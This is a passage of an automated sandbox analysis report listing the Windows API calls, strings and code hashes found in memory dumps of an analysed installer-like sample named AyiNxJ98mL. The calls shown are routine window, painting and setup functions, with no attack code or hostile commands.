                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                              • API String ID: 667068680-222143506
                                                              • Opcode ID: dff5fcaa570554af533fa68d6d4d47fa30ed3b2efb34bda6c6df081b9be12d17
                                                              • Instruction ID: 8ade474bf949b7c868f23be577f60042bf37b8b7e1302e6d2b868e4e2d48ad49
                                                              • Opcode Fuzzy Hash: dff5fcaa570554af533fa68d6d4d47fa30ed3b2efb34bda6c6df081b9be12d17
                                                              • Instruction Fuzzy Hash: D4C0E9F0AC1740EEAA00E7F15CDAD762558D514B34724943F754DAA193D97D58044A2C
                                                              APIs
                                                              • GetFocus.USER32 ref: 0041B58E
                                                              • 73A1A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                              • 73A24620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                              • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                              • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                              • 73A1A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: E680$A24620A480A570Focus
                                                              • String ID:
                                                              • API String ID: 3709697839-0
                                                              • Opcode ID: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                              • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                              • Opcode Fuzzy Hash: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                              • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                              APIs
                                                              • SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                              • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D4E8,?,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D45A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                              • API String ID: 1452528299-1580325520
                                                              • Opcode ID: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                              • Instruction ID: bfdb5615fdc952ab51c5d4d36cfcdc52ba3649a349ed7733e19bd606ff263fd4
                                                              • Opcode Fuzzy Hash: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                              • Instruction Fuzzy Hash: A6117835A04204ABD731DE95C941A5E76DCDF46306F608077AD0596283D67C6F0A952A
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                              • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                              • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                              • 73A24620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                              • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                              • 73A1A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: A24620MetricsSystem$A480A570
                                                              • String ID:
                                                              • API String ID: 4042297458-0
                                                              • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                              • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                              • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                              • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                              APIs
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0047E272
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CFF1), ref: 0047E298
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0047E2A8
                                                              • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E2C9
                                                              • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E2DD
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E2F9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$Show
                                                              • String ID:
                                                              • API String ID: 3609083571-0
                                                              • Opcode ID: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                              • Instruction ID: 64a3e6c2176d4acc74ea6130292171d5cd043058eec335b926c35577e1896bc6
                                                              • Opcode Fuzzy Hash: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                              • Instruction Fuzzy Hash: DE010CB5651210ABE600D769DE41F66379CAB0D334F0503AAB959DF2E3C729EC009B49
                                                              APIs
                                                                • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                              • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                              • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                              • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                              • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                              • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                              • String ID:
                                                              • API String ID: 3527656728-0
                                                              • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                              • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                              • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                              • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                              APIs
                                                                • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                              • ShowWindow.USER32(?,00000005,00000000,00497991,?,?,00000000), ref: 00497762
                                                                • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                                • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                              • String ID: .dat$.msg$IMsg$Uninstall
                                                              • API String ID: 3312786188-1660910688
                                                              • Opcode ID: 8060b02bfbd0833a98a3e6243afb85b8b494b7fa2efbfb07078fe99f385005b5
                                                              • Instruction ID: bbf2e7f3574d42a9113524bdb42c94a944b0e97273f2a70b882bd080beededf8
                                                              • Opcode Fuzzy Hash: 8060b02bfbd0833a98a3e6243afb85b8b494b7fa2efbfb07078fe99f385005b5
                                                              • Instruction Fuzzy Hash: 8E318F74A10214AFDB00EF65DC82D6E7BB5EB89318B51847AF800AB392D739BD01CB58
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAEA
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAF0
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressByteCharHandleModuleMultiProcWide
                                                              • String ID: ShutdownBlockReasonCreate$user32.dll
                                                              • API String ID: 828529508-2866557904
                                                              • Opcode ID: 915f5369749bf1dd2f4e97bc9020bef18acdf07caf1deb2404a0262322aa2bf8
                                                              • Instruction ID: f5c55ae169209784706469d1b6e96428d25835975ad7b3a5622eb1d8c2489c6d
                                                              • Opcode Fuzzy Hash: 915f5369749bf1dd2f4e97bc9020bef18acdf07caf1deb2404a0262322aa2bf8
                                                              • Instruction Fuzzy Hash: 2DF022E078062136E620E2BFACC3F6B498C8FA0725F040436F009EA2C2E92C9900422E
                                                              APIs
                                                              • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02164CBC,000026A8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02164CBC,000026A8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02164CBC,000026A8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02164CBC,000026A8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                              • String ID: t:X
                                                              • API String ID: 730355536-3969916449
                                                              • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                              • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                              • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                              • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                              APIs
                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457E64
                                                              • GetExitCodeProcess.KERNEL32(?,00498116), ref: 00457E85
                                                              • CloseHandle.KERNEL32(?,00457EB8,?,?,004586D3,00000000,00000000), ref: 00457EAB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                              • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                              • API String ID: 2573145106-3235461205
                                                              • Opcode ID: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                              • Instruction ID: 6a931132ee958b8202ab537f65b64b7fb4871f4dbf11571726e28c2ddef09419
                                                              • Opcode Fuzzy Hash: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                              • Instruction Fuzzy Hash: 1101A735604704AFDB11EB999D43A1E77A8DB49711F5004B6FC10E73D3D63C9D048618
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                              • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressExchangeHandleInterlockedModuleProc
                                                              • String ID: ChangeWindowMessageFilter$user32.dll
                                                              • API String ID: 3478007392-2498399450
                                                              • Opcode ID: 9d5cf1aadbd407eeb031432e352e4554899be5068d45876e9cc0d059751b9763
                                                              • Instruction ID: 5ef4959e42d5312267b3952f4de6be483a2b5690063b138e9708ef51bd19b1c3
                                                              • Opcode Fuzzy Hash: 9d5cf1aadbd407eeb031432e352e4554899be5068d45876e9cc0d059751b9763
                                                              • Instruction Fuzzy Hash: A3E0ECB1741314EADA106B62BECBF5A2558E724B15F54043BF101751F2C7BD2C80C95E
                                                              APIs
                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                              • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProcessThreadWindow
                                                              • String ID: AllowSetForegroundWindow$user32.dll
                                                              • API String ID: 1782028327-3855017861
                                                              • Opcode ID: 68b371c1f4cd94bc20bebdce253c565989975d555a3c9a3b5155311c67ca03d8
                                                              • Instruction ID: 8233eca9c26ae86130ab8a2651ceb45e7b9436c82c984da63702dcb6f06a18e2
                                                              • Opcode Fuzzy Hash: 68b371c1f4cd94bc20bebdce253c565989975d555a3c9a3b5155311c67ca03d8
                                                              • Instruction Fuzzy Hash: 27D0A7A0208300A6ED10F3F14C47E6F224C8D847587A4C43B7404E3182CABCE900993C
                                                              APIs
                                                              • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                              • SaveDC.GDI32(?), ref: 00416C93
                                                              • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                              • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                              • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                              • String ID:
                                                              • API String ID: 3808407030-0
                                                              • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                              • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                              • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                              • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                              • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                              • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                              • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                              APIs
                                                              • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                              • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                              • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                              • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                              • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                              • Opcode Fuzzy Hash: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                              • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                              • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                              • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                              • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                              • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: MetricsSystem$A26310A570DeleteObject
                                                              • String ID:
                                                              • API String ID: 4277397052-0
                                                              • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                              • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                              • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                              • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                              APIs
